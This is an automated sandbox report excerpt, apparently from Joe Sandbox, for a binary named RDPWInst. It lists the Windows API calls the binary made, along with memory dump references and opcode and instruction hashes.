                                                                                                                                                        • Opcode Fuzzy Hash: 57ba5b2eaa9ba2f7f394178960eeeee68cc8fe68392739164dda0304afca2262
                                                                                                                                                        • Instruction Fuzzy Hash: 5A317C70A1021A9BDB00DFE9C885AAEB3B5FF44304F00457AE991E72D1DB78AE44CB58
                                                                                                                                                        APIs
                                                                                                                                                        • FindResourceW.KERNEL32(00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000,0044BFA8,?,0044BFA8,00000000,?,0043CEE1), ref: 0042FB5F
                                                                                                                                                        • LoadResource.KERNEL32(00400000,0042FBE4,00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000,0044BFA8,?,0044BFA8,00000000), ref: 0042FB79
                                                                                                                                                        • SizeofResource.KERNEL32(00400000,0042FBE4,00400000,0042FBE4,00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000,0044BFA8), ref: 0042FB93
                                                                                                                                                        • LockResource.KERNEL32(0042F774,00000000,00400000,0042FBE4,00400000,0042FBE4,00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000), ref: 0042FB9D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3473537107-0
                                                                                                                                                        • Opcode ID: 6ebdd4f1cd543b76a016c77fc1286a410c61f79913e5f64509fe1404532659ad
                                                                                                                                                        • Instruction ID: 2319d0df2cd87803d0a75df5626f4cddb48e3135002f19a9a4d545a6677a7621
                                                                                                                                                        • Opcode Fuzzy Hash: 6ebdd4f1cd543b76a016c77fc1286a410c61f79913e5f64509fe1404532659ad
                                                                                                                                                        • Instruction Fuzzy Hash: 49F06DB37012146F9745EEADA881D6B77FDEE88264390017FFA08D7202DA38ED154379
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(00449C1C), ref: 0040A0F8
                                                                                                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 0040A10E
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00449C1C,00449C1C), ref: 0040A143
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeavelstrcmpi
                                                                                                                                                        • String ID: YD
                                                                                                                                                        • API String ID: 2420758022-4277794568
                                                                                                                                                        • Opcode ID: 0b44f2d380ec5fe545f4f2e3965f64519b1ec05f6d6c381fa1d4a9968702bb33
                                                                                                                                                        • Instruction ID: abf7b61c1320a37f19f23f54b7b1c16b8e1f28cb69a34480c51c1f01e8ca554a
                                                                                                                                                        • Opcode Fuzzy Hash: 0b44f2d380ec5fe545f4f2e3965f64519b1ec05f6d6c381fa1d4a9968702bb33
                                                                                                                                                        • Instruction Fuzzy Hash: 8AF062322003145BEF106A619CC2B1677989F15714F100037FB007F2C3D6BC9C60466F
                                                                                                                                                        APIs
                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00405A9A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                        • String ID: $$@
                                                                                                                                                        • API String ID: 3192549508-1194432280
                                                                                                                                                        • Opcode ID: ffbabee0d71fd2b7d8fc05915f2ca3a30f23b11c7e3ffcedbc7f052df7b7c5c2
                                                                                                                                                        • Instruction ID: fff674c7101e68f6d73d2d8a69124ddc370c84ad249f2bdacb9cff7d7fa155c1
                                                                                                                                                        • Opcode Fuzzy Hash: ffbabee0d71fd2b7d8fc05915f2ca3a30f23b11c7e3ffcedbc7f052df7b7c5c2
                                                                                                                                                        • Instruction Fuzzy Hash: 1C418C75304A019FD720DB14D884B2BB7A5EB89314F69867AF444AB392C738EC41CF69
                                                                                                                                                        APIs
                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00405906
                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_0000589C), ref: 00405943
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                        • String ID: $$@
                                                                                                                                                        • API String ID: 3192549508-1194432280
                                                                                                                                                        • Opcode ID: 23fdc1c80813b7a19c68f0c79cc3fa5e3fa91e7525bef4bca6a264e8681dbcfb
                                                                                                                                                        • Instruction ID: 4b325d1a8302ad8f82e944498d23502563e7d009f61a8d4e6d3783212fd5e4e2
                                                                                                                                                        • Opcode Fuzzy Hash: 23fdc1c80813b7a19c68f0c79cc3fa5e3fa91e7525bef4bca6a264e8681dbcfb
                                                                                                                                                        • Instruction Fuzzy Hash: 533141B4604700EFD720DB10D888B6BBBA9EB84724F54857AF448A7291C738EC40CF69
                                                                                                                                                        APIs
                                                                                                                                                        • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00411595), ref: 0041152C
                                                                                                                                                        • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,00411595), ref: 00411532
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DateFormatLocaleThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3303714858-3916222277
                                                                                                                                                        • Opcode ID: 0d5b63d8b5d64c377b747a6270c18780734cafdd64312a6cbce0b29c00a6c7cf
                                                                                                                                                        • Instruction ID: da40258a30b1bf54e866a7fbbaf5cc9082ba5d6ba5cf06b5a9e2a769468a01f6
                                                                                                                                                        • Opcode Fuzzy Hash: 0d5b63d8b5d64c377b747a6270c18780734cafdd64312a6cbce0b29c00a6c7cf
                                                                                                                                                        • Instruction Fuzzy Hash: 2C21BB31A04254AFC711DF64C8556EA77B5EF49300F4140A7FD45E72A1D6389E50C7AA
                                                                                                                                                        APIs
                                                                                                                                                        • GetThreadLocale.KERNEL32 ref: 00415102
                                                                                                                                                        • GetSystemMetrics.USER32(0000004A), ref: 00415153
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LocaleMetricsSystemThread
                                                                                                                                                        • String ID: p[D
                                                                                                                                                        • API String ID: 3035471613-2202972244
                                                                                                                                                        • Opcode ID: da98f0b9cf3a04fcb2a289a8677121395d8df8e9f207d3304538472cbe0e1366
                                                                                                                                                        • Instruction ID: 0794bcb2409efff6a4af82a72d6dc306925be2e2831a755ee0de451743422fb7
                                                                                                                                                        • Opcode Fuzzy Hash: da98f0b9cf3a04fcb2a289a8677121395d8df8e9f207d3304538472cbe0e1366
                                                                                                                                                        • Instruction Fuzzy Hash: 4A010430A00650EADB129E6658813D27BD49B82315F48C0BBED489F387D63CD881C77A
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,00447324,00443D31,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043A693
                                                                                                                                                          • Part of subcall function 0040AA94: GetProcAddress.KERNEL32(?,?), ref: 0040AAB8
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                        • API String ID: 1646373207-3689287502
                                                                                                                                                        • Opcode ID: 3a9063c87b9bf03a8dd6229c9438aece060355b6351e033b19066e162e83d57d
                                                                                                                                                        • Instruction ID: 7cbe884eb00d1b8f8e0b90a93abb1152f64afda344a6e4615680911855581588
                                                                                                                                                        • Opcode Fuzzy Hash: 3a9063c87b9bf03a8dd6229c9438aece060355b6351e033b19066e162e83d57d
                                                                                                                                                        • Instruction Fuzzy Hash: D4E012513883C21AD61276FA1DD2B2E26CC4B6D709F2C287FB5C0D1193D99DC468863F
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,00447324,00443E55,000001F4,000001F4,000003E8,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043A72F
                                                                                                                                                          • Part of subcall function 0040AA94: GetProcAddress.KERNEL32(?,?), ref: 0040AAB8
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                        • API String ID: 1646373207-1355242751
                                                                                                                                                        • Opcode ID: 349a73e186955f1baf5885772f004c34863de15e74dc15c33fb7743de3b5e964
                                                                                                                                                        • Instruction ID: 7f98099b70b18dc0c665e624c368f4c8ddeaec672eef30118536404a03429535
                                                                                                                                                        • Opcode Fuzzy Hash: 349a73e186955f1baf5885772f004c34863de15e74dc15c33fb7743de3b5e964
                                                                                                                                                        • Instruction Fuzzy Hash: FBE0C2013883C21EE60272F90DD1B3A17D84B6C308F24183FB1C0D1183DB9CC524862F
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,0044313B,00000000,0044315A), ref: 00415B46
                                                                                                                                                          • Part of subcall function 0040AA94: GetProcAddress.KERNEL32(?,?), ref: 0040AAB8
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                        • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                                                                                                                        • API String ID: 1646373207-1127948838
                                                                                                                                                        • Opcode ID: a738386b4eb64180ba5d2c03a1b622a8c2aaab42401b0cdd019b227c0ec9c639
                                                                                                                                                        • Instruction ID: 4ad585b0bbb22d8cb86f0bca7bf1fd5c676b9542b5302fef9f3b12a8682de55f
                                                                                                                                                        • Opcode Fuzzy Hash: a738386b4eb64180ba5d2c03a1b622a8c2aaab42401b0cdd019b227c0ec9c639
                                                                                                                                                        • Instruction Fuzzy Hash: 92D0C7B4745F85DBFF10DBA55D83BD62254E785309B10043B70046D2D3D67C6894CB1D